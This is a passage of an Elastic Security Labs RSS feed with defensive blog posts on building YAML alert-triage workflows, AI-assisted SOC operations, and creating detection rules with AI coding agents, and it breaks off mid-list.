<p>We'll build an alert triage workflow incrementally. Each section adds a capability, and by the end, you'll have a working playbook that handles the full triage loop.</p>
<h3>Start with the trigger</h3>
<p>Security workflows start with an event. It could be an alert, a case update, a user action, or a scheduled check. The workflow takes that signal, gathers context, and decides what to do next.</p>
<p>We’ll start with alert triage. It’s the most common path, and it shows the full loop end to end. Each section adds a capability, and by the end, you’ll have a working playbook.</p>
<p>Here’s a minimal workflow with an alert trigger:</p>
<pre><code class="language-yaml">name: Alert Triage Playbook
description: Enriches alerts, checks threat intel, creates a case, and notifies the team.
enabled: true
tags:
  - security
  - triage

triggers:
  - type: alert

steps:
  # we'll build these out
</code></pre>
<p>The <code>alert</code> trigger connects this workflow to detection rules. You link a specific rule to this workflow from the rule's <strong>Actions</strong> settings in Kibana. When the rule fires, the workflow runs and receives the full alert context through the <code>event</code> variable. That includes <code>event.alerts</code> (the alert documents), <code>event.rule</code> (the rule metadata), and every field on the alert.</p>
<p>From here, you start adding steps.</p>
<h3>Check threat intel</h3>
<p>The first real step: take the file hash from the alert and check it against VirusTotal. Workflows have a built-in VirusTotal connector, so you don't need to construct HTTP requests or manage API keys in your YAML (connector credentials like VirusTotal API keys or Slack tokens are configured once in the connector under <strong>Stack Management &gt; Connectors</strong>):</p>
<pre><code class="language-yaml">  - name: check_virustotal
    type: virustotal.scanFileHash
    connector-id: &quot;my-virustotal&quot;
    with:
      hash: &quot;{{ event.alerts[0].file.hash.sha256 }}&quot;
    on-failure:
      retry:
        max-attempts: 2
        delay: 3s
      continue: true
</code></pre>
<p>Every step in a workflow follows a simple, consistent structure. It starts with a <code>name</code>, which gives the step a clear identity, and a <code>type</code>, which defines the action being performed. In this case, the step calls the VirusTotal file hash scan capability. Because this is a connector-backed action, it also includes a <code>connector-id</code>, which tells the workflow which configured integration to use, including its credentials.</p>
<p>The <code>with</code> block is where you pass inputs into the step. Each step type defines the parameters it accepts. Here, you provide the file hash to scan. Rather than hardcoding values, workflows use a built-in templating engine powered by LiquidJS. The <code>{{ }}</code> syntax lets you <a href="https://www.elastic.co/docs/explore-analyze/workflows/data#workflows-dynamic-values">reference data from the execution context</a>, so the hash is pulled directly from the alert that triggered the workflow.</p>
<p>Finally, the <code>on-failure</code> block defines how the step behaves if something goes wrong. In this case, it retries twice with a short delay and continues execution even if the lookup fails. This is important in production workflows, where a transient external API issue should not block the entire triage process.</p>
<h3>Gather context with ES|QL</h3>
<p>Next, query for related alerts on the same host. ES|QL runs directly against your security indices, so there's no API bridging or credential management:</p>
<pre><code class="language-yaml">  - name: related_alerts
    type: elasticsearch.esql.query
    with:
      query: |
        FROM .alerts-security*
        | WHERE host.name == &quot;{{ event.alerts[0].host.name }}&quot;
        | WHERE @timestamp &gt; NOW() - 24 hours
        | STATS
            alert_count = COUNT(*),
            rules_triggered = VALUES(kibana.alert.rule.name),
            users_involved = VALUES(user.name)
      format: json
</code></pre>
<p>This tells you whether the host has been generating other alerts, which rules triggered, and which users were involved. That context is included in the case description and informs the severity assessment later.</p>
<p>The same approach works for any enrichment that touches data in Elasticsearch: looking up a user's first-seen date, checking how many times a hash has appeared in your logs, or pulling the process tree from endpoint data. If the data is in your cluster, ES|QL can get it.</p>
<h3>Branch on findings</h3>
<p>Now the workflow needs to decide what to do. If VirusTotal flagged the file as malicious, create a case and respond. If not, close the alert as a false positive:</p>
<pre><code class="language-yaml">  - name: check_malicious
    type: if
    condition: steps.check_virustotal.output.stats.malicious &gt; 5
    steps:
      # true positive path: steps below
    else:
      - name: close_false_positive
        type: kibana.SetAlertsStatus
        with:
          status: closed
          reason: false_positive
          signal_ids:
            - &quot;{{ event.alerts[0]._id }}&quot;
</code></pre>
<p>The <code>if</code> step evaluates a condition and runs different steps depending on the result. The false positive path closes the alert in a single step. The true positive path continues below.</p>
<h3>Create a case</h3>
<p>When the alert is confirmed malicious, open a case with context from previous steps:</p>
<pre><code class="language-yaml">      - name: create_case
        type: kibana.createCase
        with:
          title: &quot;Malware Detected: {{ event.alerts[0].file.hash.sha256 }}&quot;
          description: |
            Confirmed malicious file detected on {{ event.alerts[0].host.name }}.

            **Detection:** {{ event.rule.name }}
            **User:** {{ event.alerts[0].user.name }}
            **VirusTotal:** {{ steps.check_virustotal.output.stats.malicious }} engines flagged this file
            **Related alerts (24h):** {{ steps.related_alerts.output.values[0][0] }} 
              alerts from {{ steps.related_alerts.output.values[0][1] | size }} rules
          owner: securitySolution
          severity: high
          tags:
            - automation
            - malware
          settings:
            syncAlerts: false
          connector:
            id: none
            name: none
            type: &quot;.none&quot;
            fields: null
</code></pre>
<p><a href="https://www.elastic.co/docs/explore-analyze/workflows/data#workflows-dynamic-values">Liquid templating</a> pulls data from the alert (<code>event</code>), from the VirusTotal results (<code>steps.check_virustotal.output</code>), and from the ES|QL query (<code>steps.related_alerts.output</code>). Every field from every previous step is available to every subsequent step.</p>
<h3>Notify the team</h3>
<p>Send a Slack message so the team knows a confirmed case is open:</p>
<pre><code class="language-yaml">      - name: notify_team
        type: slack
        connector-id: &quot;security-alerts&quot;
        with:
          message: |
            Malware confirmed on {{ event.alerts[0].host.name }}.
            VirusTotal: {{ steps.check_virustotal.output.stats.malicious }} detections.
            Case created: {{ steps.create_case.output.id }}
</code></pre>
<p>Slack is one option. Jira, ServiceNow, PagerDuty, Microsoft Teams, email, and Opsgenie are all supported as connector steps.</p>
<h3>The complete workflow</h3>
<p>Here's the full workflow assembled:</p>
<pre><code class="language-yaml">name: Alert Triage Playbook
description: Enriches alerts, checks threat intel, creates a case, and notifies the team.
enabled: true
tags:
  - security
  - triage

triggers:
  - type: alert

steps:
  - name: check_virustotal
    type: virustotal.scanFileHash
    connector-id: &quot;my-virustotal&quot;
    with:
      hash: &quot;{{ event.alerts[0].file.hash.sha256 }}&quot;
    on-failure:
      retry:
        max-attempts: 2
        delay: 3s
      continue: true

  - name: related_alerts
    type: elasticsearch.esql.query
    with:
      query: |
        FROM .alerts-security*
        | WHERE host.name == &quot;{{ event.alerts[0].host.name }}&quot;
        | WHERE @timestamp &gt; NOW() - 24 hours
        | STATS
            alert_count = COUNT(*),
            rules_triggered = VALUES(kibana.alert.rule.name),
            users_involved = VALUES(user.name)
      format: json

  - name: check_malicious
    type: if
    condition: steps.check_virustotal.output.stats.malicious &gt; 5
    steps:
      - name: create_case
        type: kibana.createCase
        with:
          title: &quot;Malware Detected: {{ event.alerts[0].file.hash.sha256 }}&quot;
          description: |
            Confirmed malicious file detected on {{ event.alerts[0].host.name }}.

            **Detection:** {{ event.rule.name }}
            **User:** {{ event.alerts[0].user.name }}
            **VirusTotal:** {{ steps.check_virustotal.output.stats.malicious }} engines flagged this file
            **Related alerts (24h):** {{ steps.related_alerts.output.values[0][0] }} 
              alerts from {{ steps.related_alerts.output.values[0][1] | size }} rules
          owner: securitySolution
          severity: high
          tags:
            - automation
            - malware
          settings:
            syncAlerts: false
          connector:
            id: none
            name: none
            type: &quot;.none&quot;
            fields: null

      - name: notify_team
        type: slack
        connector-id: &quot;security-alerts&quot;
        with:
          message: |
            Malware confirmed on {{ event.alerts[0].host.name }}.
            VirusTotal: {{ steps.check_virustotal.output.stats.malicious }} detections.
            Case created: {{ steps.create_case.output.id }}

    else:
      - name: close_false_positive
        type: kibana.SetAlertsStatus
        with:
          status: closed
          reason: false_positive
          signal_ids:
            - &quot;{{ event.alerts[0]._id }}&quot;
</code></pre>
<p>That's the triage loop, automated. Alert fires, threat intel checked, context gathered, decision made, case created, team notified. Every execution is logged and auditable.</p>
<p>This is a starting point. The <a href="https://github.com/elastic/workflows/blob/main/workflows/security/response/traditional-triage.yaml">traditional-triage.yaml</a> in the Elastic Workflows library on GitHub goes further: it isolates the host, looks up the on-call analyst, creates a dedicated Slack channel, assigns the case, and posts a rich incident summary. Same patterns, more steps.</p>
<h2>Adding AI to the playbook</h2>
<p>The workflow above handles a defined path. If the hash is malicious, do X; otherwise, do Y. That covers a lot of triage work. But not every alert fits a clean branching condition, and not every case description should be a list of raw fields.</p>
<p>Workflows include AI steps that handle the parts where structured logic runs out. There are three, and they work together.</p>
<h3>Classify: let AI drive the branching</h3>
<p>Instead of branching on a VirusTotal score threshold, use <code>ai.classify</code> to categorize the alert. It considers the full alert context, not just a single number:</p>
<pre><code class="language-yaml">  - name: classify_alert
    type: ai.classify
    with:
      input: &quot;${{ event }}&quot;
      categories:
        - malware
        - phishing
        - lateral_movement
        - data_exfiltration
        - false_positive
      instructions: |
        Classify this security alert based on the alert details,
        rule name, and affected entities.
      includeRationale: true
</code></pre>
<p>The output is structured: <code>steps.classify_alert.output.category</code> returns a single string like <code>&quot;malware&quot;</code> or <code>&quot;false_positive&quot;</code>. That drives the <code>if</code> condition directly. The rationale explains why, and you can include it in the case for audit purposes.</p>
<h3>Summarize: write case descriptions that adapt</h3>
<p>Rather than templating raw field values into a case description, use <code>ai.summarize</code> to generate a readable overview. Run it once before case creation for the initial description, and once after the agent investigation to update the description with the full picture:</p>
<pre><code class="language-yaml">  - name: initial_summary
    type: ai.summarize
    with:
      input: &quot;${{ event }}&quot;
      instructions: |
        Write a one-paragraph overview of this security alert.
        State what was detected, on which host, by which user, and the severity.
        Do not include recommendations. Just the facts.
      maxLength: 300
</code></pre>
<p>The summary adapts to whatever fields are present on the alert, so you don't need to account for every possible field combination in your Liquid templates. Use <code>steps.initial_summary.output.content</code> in the case description and the Slack notification.</p>
<h3>Agent: investigate what the playbook can't</h3>
<p>The <code>ai.agent</code> step invokes an Agent Builder agent. Unlike classify and summarize, an agent has access to tools. It can query your indices, check threat intel, correlate signals across data sources, and reason about what it finds:</p>
<pre><code class="language-yaml">  - name: escalate_to_agent
    type: ai.agent
    agent-id: &quot;security-agent&quot;
    create-conversation: true
    with:
      message: |
        Investigate this alert. Search for related activity on this host,
        check for persistence mechanisms and lateral movement,
        and determine the full scope of the incident.
        Alert: {{ event | json }}
        Classification: {{ steps.classify_alert.output.category }}
        VirusTotal: {{ steps.check_virustotal.output | json }}
        Related alerts: {{ steps.related_alerts.output | json }}
    timeout: 10m
</code></pre>
<p>The agent processes the input, calls whatever tools it needs, and returns its findings. The workflow waits, then continues with the next steps: adding the investigation to the case, notifying the team, and updating the case description with a concise summary of what the agent found.</p>
<p>Setting <code>create-conversation: true</code> persists the conversation, so the workflow can fetch the agent's reasoning trail and add it to the case as a structured comment with clickable links to each query it ran. And the analyst gets a direct link to pick up the conversation with the agent if they want to dig deeper.</p>
<h3>Putting it together</h3>
<p>In the full version of this workflow, the three AI steps work in sequence:</p>
<ol>
<li><strong>Classify</strong> the alert to drive the triage decision</li>
<li><strong>Summarize</strong> the alert for the initial case description and Slack notification</li>
<li><strong>Agent</strong> investigates the full scope: persistence, lateral movement, IOCs, affected systems</li>
<li><strong>Summarize</strong> again, this time distilling the agent's findings into a concise, updated case description</li>
</ol>
<p>The case starts with a clean factual overview and evolves into a comprehensive summary as the investigation completes. The agent's full analysis and reasoning trail live as case comments for analysts who want the details.</p>
<p>The complete workflow, including the AI investigation pipeline with reasoning trails, clickable Discover links, and follow-up Slack notifications, is available in the <a href="https://github.com/elastic/workflows">Elastic Workflows library on GitHub</a>.</p>
<h2>Workflows as agent tools</h2>
<p>The integration between Workflows and Agent Builder works in both directions. Workflows can call agents (as shown above). And agents can call workflows.</p>
<p>When you expose a workflow as a tool in Agent Builder, an agent can invoke it during a conversation. The agent decides what needs to happen, and the workflow handles the execution reliably and repeatably.</p>
<p>This is the pattern demonstrated in the <a href="https://www.elastic.co/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">Chrysalis APT blog post</a>: a two-step workflow hands the entire Attack Discovery to an agent, and the agent calls workflow-backed tools to verify malware hashes, search logs, check the on-call schedule, create a case, and spin up a Slack channel. The workflow is the trigger and the safety net. The agent is the brain.</p>
<p>Agents reason. Workflows execute. Together they cover the full range from judgment to action.</p>
<h2>Open by design</h2>
<p>Not every team starts from zero. Some already have automation running in Tines, Splunk SOAR, Palo Alto XSOAR, or another platform. Workflows don't ask you to replace any of your existing tools.</p>
<p>The idea is straightforward: use Workflows for the parts of your automation that are native to Elastic. Alert triage, enrichment from your own indices, case management, and alert status updates. These touch your Elastic data directly, and a native workflow will always be simpler and faster than an external tool making API calls back into Elastic.</p>
<p>For everything else, connectors bridge the gap. We have native connectors for Tines, Resilient, Swimlane, TheHive, D3 Security, Torq, and XSOAR. A workflow can kick off a Tines story, push an incident to Resilient, or trigger any external system via HTTP. Your existing tools handle cross-platform orchestration. Workflows handle what's native. As the capability grows, you can consolidate at your own pace. Nobody's forcing a migration.</p>
<h2>What's here and what's next</h2>
<p>Workflows is available today. Here's what you can build with it today:</p>
<ul>
<li><strong>Alert triggers</strong> connect workflows to detection and alerting rules</li>
<li><strong>Case and alert management</strong> through named Kibana steps (<code>kibana.createCase</code>, <code>kibana.SetAlertsStatus</code>, <code>kibana.addCaseComment</code>, and more)</li>
<li><strong>Direct data access</strong> via Elasticsearch search and ES|QL</li>
<li><strong>39 workflow-compatible connectors</strong> covering threat intel (VirusTotal, AbuseIPDB, GreyNoise, Shodan, URLVoid, AlienVault OTX), ticketing (Jira, ServiceNow), communication (Slack, Teams, PagerDuty, email), SOAR platforms (Tines, Resilient, Swimlane, TheHive, and others), and AI providers</li>
<li><strong>AI steps</strong> for classification, summarization, prompts, and Agent Builder invoking Elastic Agents/Skils</li>
<li><strong>YAML authoring</strong> with autocomplete, validation, and step testing in Kibana</li>
<li><strong>50+ example workflows</strong> on <a href="https://github.com/elastic/workflows">GitHub</a>, including security-specific templates for detection, enrichment, and response</li>
</ul>
<p>What's coming:</p>
<ul>
<li><strong>Visual workflow builder</strong> for drag-and-drop authoring</li>
<li><strong>In-product template library</strong> to browse and install workflows directly in Kibana</li>
<li><strong>Human-in-the-loop</strong> approvals that pause workflows for human input via Slack, email, or the Kibana UI</li>
<li><strong>Natural language authoring</strong> where AI helps translate intent into working workflows</li>
</ul>
<p>Today, authoring is YAML-based. If you've written detection rules or configured CI/CD pipelines, the learning curve is gentle. The editor has built-in autocomplete, validation, and step testing, and the example library gives you templates to start from. A visual builder is coming to make this accessible to a wider audience.</p>
<h2>Get started</h2>
<p>Elastic Workflows is available now. To start building:</p>
<ol>
<li><a href="https://cloud.elastic.co/registration">Start an Elastic Cloud trial</a> or enable Workflows in your existing deployment under <strong>Stack Management &gt; Advanced Settings</strong></li>
<li>Explore the <a href="https://www.elastic.co/docs/explore-analyze/workflows">Workflows documentation</a></li>
<li>Browse the <a href="https://github.com/elastic/workflows">Elastic Workflow Library on GitHub</a> for security templates you can adapt</li>
<li>Read the <a href="https://www.elastic.co/search-labs/blog/elastic-workflows-automation">introductory technical deep dive</a> for core concepts</li>
<li>See the <a href="https://www.elastic.co/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">Chrysalis APT blog</a> for a complete Attack Discovery + Workflows + Agent Builder walkthrough</li>
</ol>
<p>Start with the workflow that would save you the most time tomorrow.</p>
<p><em>The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.</em></p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/security-automation-with-elastic-workflows/security-automation-with-elastic-workflows.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Streamlining the Security Analyst Experience]]></title>
            <link>https://www.elastic.co/security-labs/streamlining-the-security-analyst-experience</link>
            <guid>streamlining-the-security-analyst-experience</guid>
            <pubDate>Tue, 24 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Alert Triage, Investigation, and Response with Elastic's Agentic Security Operations Platform.]]></description>
            <content:encoded><![CDATA[<p>The term <strong>Agentic SOC (Security Operations Center)</strong> is one of the most popular concepts in security today. But what does it truly mean in practice, and how does Elastic Security approach this next evolution of security operations?</p>
<p>In simple terms, an Agentic SOC is a security operations center that has deployed AI Agents and corresponding AI Agent Skills to perform SOC-related workflows such as detection engineering, alert triage, incident investigation, escalation, response, and threat hunting. When these workflows are performed by AI agents, they’re often called “Agentic workflows.” These AI Agents and Skills may run natively in a security operations platform like SIEM, XDR, or security analytics, or they may be layered on top of legacy SIEM as an “AI SOC Agent” or “AI SOC analyst”, or they may even be run from an AI Coding Tool.</p>
<p>Regardless of how they are implemented, the shift to the Agentic SOC is not about AI replacing human analysts; it's about transforming how the SOC functions. To keep pace with rapidly evolving attackers, defenders must leverage AI and autonomous agents to respond as quickly as possible. At its core, an Agentic SOC is defined by how a security operations center uses <strong>AI and agents to protect against adversaries</strong>.</p>
<p>Let’s simplify a successful security operations center to three fundamental pillars, all of which the Agentic SOC significantly enhances:</p>
<ol>
<li><strong>Observe:</strong> The foundation of all security is centralized data—aggregating logs and events into one location, which is the core strength of a SIEM solution.</li>
<li><strong>Detect:</strong> This involves deploying core protections like endpoint-based security (XDR, such as Elastic Defend) and security solution-focused detections (cloud, identity data). This technology drives the generation of high-quality alerts. Elastic, for example, ships over <a href="https://elastic.github.io/detection-rules-explorer/"><strong>1,700 pre-built rules</strong></a> for its SIEM by default, not including its XDR solution's endpoint rule library.</li>
<li><strong>Act:</strong> This is the critical final stage of triaging, investigating, and acting on the generated alerts.</li>
</ol>
<h2>Agentic SOC in Action</h2>
<p>Imagine this real-life scenario unfolding in your Security Operations Center using the Elastic security platform. It begins not with a siren, but with a simple, direct Slack notification. Building on our recent <a href="https://www.elastic.co/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">blog</a> on Attack Discovery, Workflows, and Agent Builder, let's further examine how Elastic Security can help you respond to an active attack.</p>
<ol>
<li><strong>The Initial Alert and Immediate Action</strong><br />
Your security analyst receives an urgent notification in their team channel. This message isn't just a heads-up; it points directly to an observed, active attack. Crucially, the Elastic Agentic SOC has already taken decisive, pre-emptive action: a vulnerable host has been isolated from the network to contain the threat and limit potential damage. This was all powered by Elastic Workflows and Elastic Agent Builder processing realtime alert and attack data from Elastic.<br />
<img src="https://www.elastic.co/security-labs/assets/images/streamlining-the-security-analyst-experience/image5.png" alt="Example analyst notification in Slack after the AI agent has performed initial triage." title="Example analyst notification in Slack after the AI agent has performed initial triage." /></li>
<li><strong>The Centralized Case</strong><br />
The analyst's next step is a click away, moving from Slack directly to the centralized Case within Elastic that was created by the workflow. Elastic Case Management enables the SOC to coordinate the response and provides a single pane of glass into all aggregated critical information:</li>
</ol>
<ul>
<li>
<p><strong>Attack Summary:</strong> A high-level overview detailing what has occurred using Attack Discovery.</p>
</li>
<li>
<p><strong>Attached Alerts:</strong> The specific security alerts that triggered the initial observation.</p>
</li>
<li>
<p><strong>Observables:</strong> A list of suspicious artifacts (IP addresses, file hashes, domains, etc.) collected from the event.</p>
</li>
<li>
<p><strong>Attached Events:</strong> Non-alert events that, while not an alert themselves, provide critical context and are of further interest to the investigation.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/streamlining-the-security-analyst-experience/image2.png" alt="" /></p>
</li>
</ul>
<ol start="3">
<li><strong>Supporting the Investigation</strong><br />
To support the immediate findings, detailed <strong>Investigations</strong> are attached directly to the Case. These searches allow the analyst to visually and contextually step through the sequence of events leading up to, during, and immediately following the attack.<br />
The Elastic Case also provides instant context by highlighting <strong>Similar cases</strong>. By cross-referencing observables, the system identifies previous incidents involving the same entities or artifacts, providing a deeper understanding of the threat actor's history and potential motives.</li>
<li><strong>The Path to Resolution</strong><br />
The agents don’t just catalog the past; it dictates the future. A clear set of <strong>Next steps and actions</strong> are outlined, with specific team members assigned for review and execution.</li>
</ol>
<p>The analyst then steps through a methodical process reviewing the automated analysis:</p>
<ol>
<li><strong>Reviewing Findings:</strong> Scrutinizing all aggregated data, alerts, and investigations.</li>
<li><strong>Evidence Collection:</strong> Collecting any additional forensic evidence needed for a complete analysis.</li>
<li><strong>Remediation:</strong> Executing manual or automated actions, such as deleting malicious files or killing persistent processes on the isolated host with Elastic Defend.</li>
<li><strong>Final Release:</strong> Eventually, the host is safely released back to the network, but not before additional, targeted rules or policies are automatically applied to prevent a recurrence based on the lessons learned from this incident.<br />
In the Agentic SOC, the analyst moves seamlessly from a high-level alert to a comprehensive investigation to full remediation—all within a unified, intelligent workflow powered by Elastic.</li>
</ol>
<h2>Elastic Security and Core SIEM Workflows</h2>
<p>Before exploring advanced agentic workflows, it's essential to recognize that Elastic Security already provides a comprehensive suite of core capabilities crucial for modern security operations. This foundation begins with the ingestion of security-relevant data, which is automatically normalized to a common schema, ensuring consistency and ease of analysis. The platform offers Extended Detection and Response (XDR) capabilities via Elastic Defend, a robust detection engine built directly into the Elastic Stack, and sophisticated alert workflows that include built-in correlations to reduce noise and surface true threats.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/streamlining-the-security-analyst-experience/image4.png" alt="" /></p>
<p>Elastic Security further differentiates itself by tightly integrating key operational functions. This includes entity-based threat hunting, machine learning for anomaly detection and behavior analysis, and comprehensive case management for tracking incidents. Finally, the platform provides end-to-end response and forensic capabilities, enabling security teams to move swiftly from initial alert to investigation and remediation, all within a unified, scalable platform.</p>
<h2>Empowering Analysts with Agentic Capabilities</h2>
<h3>AI-Powered Alert Triage and Prioritization</h3>
<p>The Elastic Security Solution integrates AI capabilities via <strong>Agent Builder</strong> to augment and make SOC operations truly agentic. This is where efficiency improvements are most keenly felt:</p>
<ul>
<li><strong>Conversational Triage:</strong> A built-in agent is readily available to Tier 1/2 analysts, allowing them to use conversational commands to query and prioritize open alerts (e.g., &quot;What priority alerts should I review from the last 30 days?&quot;). This is the first entry point for using AI to augment SOC operations.</li>
<li><strong>LLM Agnostic Platform:</strong> A key differentiating feature of Elastic's <strong>Agent Builder</strong> is that it is <strong>LLM agnostic</strong>, allowing organizations to pick their preferred model, even locally running models for privacy or regulatory reasons.</li>
<li><strong>Attack Discovery:</strong> This premier feature moves beyond basic triage. It uses LLM configurations to create <strong>higher-order attack detections</strong>, taking hundreds of open alerts and prioritizing them into a small, manageable subset of known attacks or incidents. This dramatically reduces the impact of alert fatigue.</li>
</ul>
<p><img src="https://www.elastic.co/security-labs/assets/images/streamlining-the-security-analyst-experience/image3.png" alt="" /></p>
<h3>Enriched Investigations</h3>
<p>Once an attack or incident is found, the agent helps start the investigation:</p>
<ul>
<li><strong>Summarization and Enrichment:</strong> The agent can be used to summarize the attack, identify important artifacts, and conduct automated third-party enrichments (like checking VirusTotal). This tailored experience provides a full assessment, including an attack chain, threat intelligence information, related cases, entity risk scoring, and a full investigation guide.</li>
<li><strong>Case Management:</strong> The agent can be instructed to take immediate action, such as generating a security case and notifying the team in Slack, all through simple conversational commands that execute pre-configured workflows.</li>
</ul>
<h3>Automated Response and Threat Hunting</h3>
<p>The true power of the Agentic SOC is realized through action and automation that goes beyond simple conversation:</p>
<ul>
<li>
<p><strong>Workflows and SOAR-like Automation:</strong> Agents can reference and execute <strong>Workflows</strong>, Elastic's SOAR-like automation tool. These workflows allow analysts to take immediate, complex actions. For example, a command like &quot;Please create a case for this attack, and notify my team in Slack&quot; triggers multiple, pre-defined steps. Further critical response actions, such as <strong>isolating a host</strong>, can be executed with a single workflow action while the investigation continues.</p>
</li>
<li>
<p><strong>AI-Assisted Threat Hunting:</strong> AI assists threat hunters by leveraging <strong>Entity Analytics</strong> and pre-built skills. The agent can be asked to find high-risk hosts and users to begin hunting, and then automatically generate specific ESQL queries (e.g., &quot;Please tell me the most uncommon processes executed for each host&quot;) to uncover unusual or malicious activity.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/streamlining-the-security-analyst-experience/image1.png" alt="" /></p>
</li>
</ul>
<h3>The Mandate of Automation</h3>
<p>For maximum effectiveness, all these steps,from alert triage and enrichment to case creation and host isolation,can be configured to run <strong>automatically</strong> as an Agentic Alert Triage workflow. This allows the system to solve problems as soon as they are discovered, setting up the human analyst in the loop with a consolidated case and all the necessary findings in a single pane of glass.</p>
<p>This approach delivers substantial <strong>efficiency improvements</strong>, making speed the single most important factor in a modern, Agentic SOC.</p>
<p>Elastic’s Agentic Security Operations Platform</p>
<p>Whether you use our UI, our agents, or your own, Elastic Security provides a strong open foundation for modern security operations. best-in-class data architecture, search, workflows, analytics, detection engineering content, and automation.</p>
<h2>Getting started</h2>
<p><strong>Before you get started:</strong> AI coding agents operate with real credentials, real shell access, and often the full permissions of the user running them. When those agents are pointed at security workflows, the stakes are higher: you're handing an automated system access to detection logic, response actions, and sensitive telemetry. Every organization's risk profile is different. Before enabling AI-driven security workflows, evaluate what data the agent can access, what actions it can take, and what happens if it behaves unexpectedly</p>
<p>Don't have an Elasticsearch cluster yet? Start an <a href="https://cloud.elastic.co/registration">Elastic Cloud free trial</a>. It takes about a minute to get a fully configured environment.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/streamlining-the-security-analyst-experience/streamlining-the-security-analyst-experience.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Supercharge Your SOC]]></title>
            <link>https://www.elastic.co/security-labs/supercharge-your-soc</link>
            <guid>supercharge-your-soc</guid>
            <pubDate>Tue, 24 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Detection Engineering in the Era of AI Agents - The New Frontier.]]></description>
            <content:encoded><![CDATA[<h2>Preamble</h2>
<p>The landscape of cybersecurity is evolving, and the role of the Detection Engineer (DE) is more critical and demanding than ever. Traditionally, this role involves a comprehensive, end-to-end workflow: from threat modeling and telemetry tuning to writing, testing, and maintaining performance-optimized detection rules to flag malicious behavior.</p>
<p><strong>Elastic Security is purpose-built to streamline this entire workflow, empowering DEs - and anyone involved in security operations - to build, manage, and optimize detection rules at scale. This allows security teams to concentrate their efforts on the most critical task: protecting the organization.</strong></p>
<p>The rise of generative AI and, more specifically, advanced AI <strong>coding agents</strong> like Claude and Cursor, is fundamentally changing and supercharging this workflow.  These tools are no longer just for general software development; they are becoming expert partners for the Security Operations Center (SOC). By integrating the power of conversational AI, these agents can take high-level security requirements and instantly translate them into validated, workable detection logic.</p>
<h1>From Generalist to Elastic Expert: Agent Skills</h1>
<p>Elastic Security is embracing this shift not only by having native AI capabilities built-into our agentic security operations platform , but also by <a href="https://www.elastic.co/search-labs/blog/agent-skills-elastic">open-sourcing <strong>agent skills for 3rd party agentic IDEs</strong></a>, a native platform experience for the entire Elastic ecosystem (Security, Observability, etc.). By loading these skills into any agent runtime, your AI assistant moves from being a generalist to an on-demand expert in Elastic’s tooling. You can then ask your agent to triage alerts or, in this context, expertly create and tune detection rules</p>
<h1>A Use Case Walkthrough: The Notepad++ Attack</h1>
<p>To illustrate the agent’s power, let’s look at a real-world supply chain-based attack involving a backdoor targeting the Notepad++ infrastructure described in Elastic Security Lab’s blog, <a href="https://www.elastic.co/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">“Speeding APT Attack”</a><strong>.</strong></p>
<h2>Instant Conditional Rules</h2>
<p>A detection engineer’s first step is often to create conditional rules based on known Indicators of Compromise (IOCs). To begin, we can instruct the agent to investigate data within Elastic Security, as evidence of the attack was present in our cluster.</p>
<pre><code>&quot;Can you help me create a detection rule that will detect malicious activity similar
 to what I'm seeing in my Elastic Security deployment involving notepad++.exe 
 and BluetoothService.exe?&quot;
</code></pre>
<p>The agent immediately went to work:</p>
<ul>
<li>It rapidly found process lineage and documented attack details.</li>
<li>It extracted key IOCs and found the corresponding MITRE ATT&amp;CK™ mappings.</li>
<li>It generated two foundational rules: one for a suspicious child process spawned by <strong>Notepad++</strong>, and one focusing on the masqueraded executable.</li>
<li>Crucially, the rules were immediately tested against threat emulation data, confirming multiple successful hits.</li>
</ul>
<p>Each step is happening quickly, and the built-in validation significantly accelerates the 'test and tune' phase.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image2.png" alt="Agent progress initiating creation of conditional detection rules (Claude Code shown)" title="Agent progress initiating creation of conditional detection rules (Claude Code shown)" /></p>
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image7.png" alt="Agent report after creating two conditional detection rules (Claude Code shown)" title="Agent report after creating two conditional detection rules (Claude Code shown)" /></p>
<p>Let’s take a look at the agent-created rule in Elastic Security:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image3.png" alt="Agent-created rule details appear seamlessly in Elastic Security" title="Agent-created rule details appear seamlessly in Elastic Security" /></p>
<h2>Diving into Advanced ESQL Aggregation</h2>
<p>Conditional logic is great, but modern threats require more behavioral and entity-focused detections. Using Elastic’s powerful piping language, <a href="https://www.elastic.co/docs/reference/query-languages/esql">ES|QL</a> (Elastic Search Query Language), the agent was challenged to create an <strong>aggregation-based rule</strong> that looks for generic, suspicious characteristics across tasks, aggregates them, and assigns a dynamic risk score to host and user entities.</p>
<p>The agent delivered, creating an advanced query that looks for suspicious executables, negates benign directories, and assesses scores based on the activity's risk level. This demonstrates the agent's ability to create sophisticated detections unique to Elastic's capabilities, moving beyond simple lookups to complex entity analytics.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image4.png" alt="Agent creating aggregation-based detection rule (Claude Code shown)" title="Agent creating aggregation-based detection rule (Claude Code shown)" /></p>
<p>Here’s the rule in Elastic Security:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image1.png" alt="More complex aggregation-based rule appears properly in Elastic Security" title="More complex aggregation-based rule appears properly in Elastic Security" /></p>
<h2>Sequential Detections with EQL and Suppression</h2>
<p>To detect multi-stage attacks, a <strong>sequential rule</strong> is essential—if Event A, then Event B, then Event C, then alert. Using the <a href="https://www.elastic.co/docs/solutions/security/detect-and-alert/eql">Event Query Language (EQL)</a>, the agent crafted a perfect three-stage sequence for the attack:</p>
<ol>
